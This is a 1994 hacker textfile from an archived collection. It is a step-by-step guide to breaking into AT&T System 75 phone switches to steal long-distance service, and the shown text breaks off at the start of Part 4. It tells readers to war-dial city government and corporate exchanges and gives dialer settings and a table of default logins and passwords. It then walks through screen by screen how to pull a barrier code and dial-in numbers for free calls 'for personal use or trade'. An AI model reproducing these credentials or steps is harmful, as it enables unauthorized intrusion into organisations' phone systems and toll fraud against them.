home *** CD-ROM | disk | FTP | other *** search

---

/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Textfiles / k0p - oleBuzzard / System7.5Guide.txt

< prev

next >

Wrap

Text File  |  1998-02-21  |  16KB  |  345 lines

---

1.            #######################################################
2.            #                                                     #
3.            #   oleBuzzard's          %%%%%%%%%%%%%% %%%%%%%%%%   #
4.            #                        %%%%%%%%%%%%%% %%%%%%%%%%    #
5.            #   Compleat Guide To           %%%%%% %%%%           #
6.            #                              %%%%%% %%%%            #
7.            #   ###        ##  ##  ##  ###       %%%%%%%%%%       #
8.            #   ##  #####  ##  ##  ##  ##  ##### %%%%%%%%%        #
9.            #   ###   ###  ###    ###  ###   ###     %%%%         #
10.            #   #####  ##  ####  ####  #####  ##    %%%%          #
11.            #         ###  ####  ####        ### %%%%%%           #
12.            #                                                     #
13.            ###########################################05-Jan-94###
14.               
15. INTRODUCTION/SCORN
16.  
17.   You know, I've always hated 'Elitism' in the BBS world. For me, the reason
18.   why I got into BBSing was because of my enthusiasm for computers and my
19.   obsession with information. I thrive off of knowledge and reap the
20.   benefits. My only obstacle in life are those I have encountered who felt I
21.   was not worthy of the information I sought. These people make me sick,
22.   especially the ones who know so very little yet think they know oh so much.
23.   Which brings me to todays topic: System 75.
24.  
25.   You want to know how you can tell a real lamer? Ask him for information
26.   about System 75. 9 times out of 10, the person will scoff at you and act as
27.   if he was the head of the Joint Chiefs of Staff and you were a Private
28.   asking HIM about covert maneuvers in the Asian Theatre. This attitude most
29.   apparently reveals itself in almost every file on System 75 I have ever
30.   read. I have yet to read a file on System 75 (including the one in Phrack
31.   41) that included even one default, or even information on how to find a
32.   Sys75. Its a fucking joke and not a very funny one. Although Sys75s are
33.   very intereseting systems to hack, they are hardly worthy of the coveted
34.   status they receive. (Of course, in my opinion no information is worthy of
35.   coveted status, but thats another story.) The truth is Sys75s are great
36.   systems because they are relativley easy to learn and manipulate and they
37.   are one of the only systems that in and of themselves involve a blending of
38.   hacking and phreaking. This file will aid you in your first attempt at
39.   Sys75 and hopefully give you an adequate and useful introduction to one of
40.   the undergrounds favorite systems.
41.  
42. SYSTEM 75 INFO
43.  
44.   System 75 is a hardware/software based multi-purpose communications system
45.   offering a wide range of business applications, including Voice Mail
46.   (AUDIX), networking (ISDN) and long-distance teleconferencing (PBX!!!) For
47.   purposes of this file we will focus on Sys75s Long-Distance
48.   teleconferencing capabilities as made possible by the Public Branch
49.   Exchange. 
50.  
51.   System 75s have the ability to establish a new PBX or retreive all the
52.   information about an existing PBX. In either case, if you can accomplish
53.   the task at hand - retreiving PBX info or establishing a new PBX - the end
54.   result is the same, free phone calls -- a valuable commodity in the realm
55.   of underground communications. This is why System 75s are so popular and
56.   information on them so coveted. Unfortunatley if you don't know what you're
57.   looking for or what you're doing you won't get far. Thats what this file is
58.   for. To Aid you in finding a Sys75 and help you to correctly manipulate the
59.   system once you've found it. (You can thank me later.)
60.  
61. HACKING SYSTEM 75
62.  
63.   In the following pages you will see many screens from an ACTUAL System 75
64.   (ooo!) The screens will be within various steps of either retrieving
65.   information on an existing PBX or on establishing a new PBX. Some useful
66.   but nonessential information may be cut out and as well some information
67.   may be ommitted for security reasons. But rest assured there will be more
68.   than enough information retained to help you establish your very own PBX.
69.  
70.   PART 1: Finding and Identifying a System 75
71.  
72.   Well finding and identifying a System 75 are relativley easy tasks so I
73.   won't spend much time on it, but I will note that finding and identifying,
74.   although complementary, are two different tasks. I have often seen
75.   information on identifying a Sys75, but I have never seen anything on how
76.   to actually find one. If you can't find one, who cares how to identify
77.   one!?!
78.  
79.   Finding A System 75
80.    
81.   When trying to find a System 75, I suggest you employ a quality scanner
82.   that is reliable and bug free. My experience is that very few scanners meet
83.   this criteria and instead most have glitches to the point that they are all
84.   but useless. Of course nothing is without exception. There are a few
85.   scanners I have found to be relativley reliable. These include ToneLoc
86.   .098, BlueBeep .007 and on the Macintosh, Holy War Dialer v2.0. 
87.  
88.   Once you have found a reliable scanner I suggest you configure it with the
89.   following parameters to ensure optimal scan speed without missing a System
90.   and to cut down on the amount of unnecessary scanning. 
91.  
92.       Baud Rate: 2400 [Scanning for all baud rates UP TO 2400 inclusive]
93.   Time Interval: approx. 18sec. [Different scanners, different count but 18
94.                                  seconds in real time is about right]
95.      Starting #: xxx-0000 [ALWAYS start here]
96.        Ending #: xxx-0500 [I have never found a Sys75 past 0500 and in fact
97.                            most I have found have been in the xxx-00xx range
98.                            or in other words, with in the first 99 numbers of
99.                            an exchange.]
100.  
101.   I would suggest looking for a Sys75 in your citys Municipal Government
102.   exchange first. Where I live all city and county facilities with in the
103.   city (courthouse, police, PUC, etc) have the same exchange. Start your scan
104.   in this exchange(s) because there is almost certainly System 75 set-up.
105.  
106.   Once you find a Sys75 in an exchange move to another exchange to look for
107.   the next one. Some have argued (correctly so) that there are sometimes more
108.   than one Sys75 in an exchange. Although they are correct I have found far
109.   more Sys75s by searching the first 500 numbers of many exchanges than 9999
110.   numbers in a few. Also, only once have I found more than one Sys75 in an
111.   exchange.
112.  
113.   Once you have exhausted your scan of the municipal exchange(s) I suggest
114.   moving to an exchange assigned to a large company. In many cases there are
115.   company facilities so large they are assigned their own exchange.  These
116.   facilities almost certainly have a Sys75 set up, so check it out. Examples
117.   of facilities I know of that have their own exchange and a Sys75 within
118.   that exchange are IBM, HP, DEC and KAMAN Sciences in the city of You
119.   Wishville.
120.  
121.   My final tip on finding a System 75 is to scan at night. It cuts down on
122.   the possibility of hitting a system which is in use and thus has the line
123.   occupied. Of course if all you guys hack at night then the line will be
124.   busy anyway and it won't matter, so....
125.  
126.   Identifying A System 75
127.  
128.   You'll be able to identify a System 75 by the following information which
129.   appears when you have connected to one.
130.  
131.  PROTOCOL: NONE
132.  CONNECT 1200 [1200 baud is a good indicator that you have found a Sys75]
133.  
134.  KEYBOARD LOCKED, WAIT FOR LOGIN [Short pause here]
135.  Login: 
136.  
137.   Ok, well thats what a System 75 looks like when you've first connected. You
138.   don't have to hit any special keystrokes at this point and all entries end
139.   with <CR>. 
140.  
141.   PART 2: Logging In
142.  
143.   Passwords, password, passwords! The assholes never give you the fuckin
144.   passwords. What the fuck does a tutorial on System 75 do if it doesn't
145.   include a password so you can actually do something?!? Not much in my
146.   opinion. Well Sys75s have two types of passwords. Those which can alter
147.   information and those which can only browse information. The following is a
148.   list of ALL Sys75 defaults. Although the list is complete there is no
149.   gaurantee that all or any of them work. Also, because the access for the
150.   defaults is assignable you have to check for yourself to see which defaults
151.   alter and which defaults can only browse. The information I am providing is
152.   for the last Sys75 I hacked. 
153.  
154.   System 75 Default Accounts
155.  
156.   Login       Password       Type
157.   -----       --------       ----
158.   bcim        bcimpw         didn't work
159.   bcms        bcms           didn't work
160.   blue        bluepw         altering
161.   browse      looker         browsing
162.   craft       craftpw        didn't work
163.   cust        custpw         browsing
164.   enquiry     enquirypw      browsing
165.   inads       inads          didn't work
166.   init        initpw         didn't work
167.   locate      locatepw       browsing
168.   maint       rwmaint        altering
169.   rcust       rcustpw        altering
170.   support     supportpw      didn't work
171.   tech        field          altering
172.  
173.   Once you've logged in you will be prompted to enter the Terminal Type.
174.  
175. Terminal Type (513, 4410, 4425): [513] 513
176.                                           \
177.                                            Enter 513, thats the default.
178.   
179.   And then you will see the world famous login screen:
180.  
181. _____________________________________________________________________________
182.  
183.  
184.                            Copyright (c) 1986 - AT&T
185.                       Unpublished & Not for Publication
186.                              All Rights Reserved
187.  
188.  
189. _____________________________________________________________________________
190.  
191. enter command: _
192.  
193.   PART 3: Hack 1 - Retreiving PBX Information
194.  
195.   The following information is on how to retreive PBX info for your own use.
196.   This is the safest method of hacking Sys75 because it doesn't require
197.   altering ANY information. This is relativley easy so I'll go through it
198.   quick. You will be given the prompt, enter command: You can basically enter
199.   everything I enter word for word to make the hack.
200.  
201. enter command: disp rem [short for display remote-access]
202. _____________________________________________________________________________
203.  
204. display remote-access                                             Page 1 of 1
205.  
206.  
207.                Remote Access Extension: 2531
208.                    Barrier Code Length: 5  \
209.            Authorization Code Required? n   PBX already established
210.  
211.  
212. BARRIER CODE ASSIGNMENTS (Enter up to 10)
213.         Barrier Code    COR COS                Barrier Code    COR COS
214.      1: 49138           1   1               6:                 1   1
215.      2:     \           1   1               7:                 1   1
216.      3:      Code       1   1               8:                 1   1
217.      4:                 1   1               9:                 1   1
218.      5:                 1   1              10:                 1   1
219.  
220.   In this (rare) instance we have found a Sys75 with a PBX already set up.
221.   All we have to do is find the corresponding trunk-group and get the dial-in
222.   number. The trunk group contains all the routing information for the trunk
223.   the PBX goes through. 
224.  
225.   * NOTE * Write down the Barrier Code. You will need it! (duh!)
226.  
227.   To find the trunk that corresponds to the established PBX we will be
228.   looking for a trunk group with a Night Service extension the same as the
229.   Remote Access Extension (from disp rem).
230.  
231. enter command: disp trunk 1
232.  
233. _____________________________________________________________________________
234.  
235. display trunk-group 1                                             Page 1 of 5
236.  
237. Group Number: 1                    Group Type: did           SMDR Reports? y
238.   Group Name: Intra-Lata                  COR: 1                      TAC: 50
239.                                                          Data Restriction? n
240. MIS Measured? n
241.  
242.  
243.                                     Auth Code? n
244. q
245. TRUNK PARAMETERS
246.             Trunk Type: wink-start       Incoming Rotary Timeout(sec): 5
247.                                                    Incoming Dial Type: tone
248.      Trunk Termination: 600ohm                Disconnect Timing(msec): 300
249.        Digit Treatment:                                        Digits:
250.        Expected digits:
251.         ACA Assignment? n
252.  
253.  
254.                                                     Maintenance Tests? y
255.  Answer Supervision Timeout:
256. ___________________________________________________________________________
257.  
258.   Well this ain't it because this one doesn't even contain a Night Service. A
259.   Night Service is important because it determines whether or not a PBX is 24
260.   hour or not. No Night Service means during business hours only. For
261.   purposes of this hack a Night Service is important because it will identify
262.   the correct trunk. 
263.  
264.   Because there is no Night Service we won't bother to check the other four
265.   pages (Note the top of the screen says Page 1 of 5). Normally we would
266.   check the other pages and we would do so by hitting ESC [U for next page.
267.   Instead we'll cancel the last command and check some other trunks. At the
268.   prompt enter ESC Ow
269.  
270.   Go through all the trunks until you find one with a corresponding Night
271.   Service. The process for going through trunks is simple. Enter disp trunk x
272.   (where x is a number from 1 to 99) and hit <CR>. If you don't see a Night
273.   Service or if you see a Night Service and the extension following the Night
274.   Service doesn't match the Remote Access Extension then hit ESC Ow and goto
275.   the next trunk and repeat the process.
276.  
277. enter command: disp trunk 6
278.  
279. _____________________________________________________________________________
280.  
281. display trunk-group 6                                             Page 1 of 5
282.  
283. Group Number: 6                    Group Type: co            SMDR Reports? y
284.   Group Name: Intra-Lata                  COR: 7                      TAC: 25
285.    Direction: two-way        Outgoing Display? n         Data Restriction? n
286. MIS Measured? n                                        
287.  Dial Access? y                Busy Threshold: 1            Night Service: 2531
288. Queue Length: 1         Abandoned Call Search? n     Incoming Destination: 
289.    Comm Type: voice                 Auth Code? n    Digit Absorption List:
290.     Prefix-1? y                   Restriction: toll    Allowed Calls List? y
291. TRUNK PARAMETERS
292.             Trunk Type: loop-start
293.     Outgoing Dial Type: tone
294.      Trunk Termination: rc                    Disconnect Timing(msec): 500
295.  
296.  
297.         ACA Assignment? n
298.  
299.  
300.                                                     Maintenance Tests? y
301.  Answer Supervision Timeout:                    Suppress # Outpulsing? n
302. _____________________________________________________________________________
303.  
304.   Well we found it. Notice the Night Service and extension. This group has
305.   Night Service and it has an extension the same as the remote-access
306.   extension. Next all we need to do is find out the dial-in number. At the
307.   prompt enter: ESC [U for the next page.
308.  
309. _____________________________________________________________________________
310.  
311. display trunk-group 6                                             Page 2 of 5
312.  
313. GROUP MEMBER ASSIGNMENTS
314.  
315.                  Port      Name         Mode         Type    Answer Delay
316.               1: D2003    635xxxx
317.               2: D2004    635xxxx
318.               3: D2005    635xxxx
319.               4: D2006    635xxxx
320.               5: D2002    635xxxx
321.               6:
322.               7:
323.               8:
324.               9:
325.              10:
326.              11:
327.              12:
328.              13:
329.              14:
330.              15:
331.  
332. _____________________________________________________________________________
333.  
334.   Well I decided not to include the complete dial-in number, but you get the
335.   idea. All you have to do at this point is write down ALL the dial-in
336.   numbers and logoff. Type ESC Ow to cancel (exit) and at the prompt type:
337.   logoff to (guess.)
338.  
339.   Now dial one of the dial-in numbers and enter the Barrier Code+9+1+ACN and
340.   thats it. No changes made and you've only committed one count of unlawful
341.   entry of a computer system (10 days with work release tops). Now you have
342.   an unabused PBX for personal use or trade.
343.  
344.   PART 4: Hack 2 - Setting Up A PBX
345.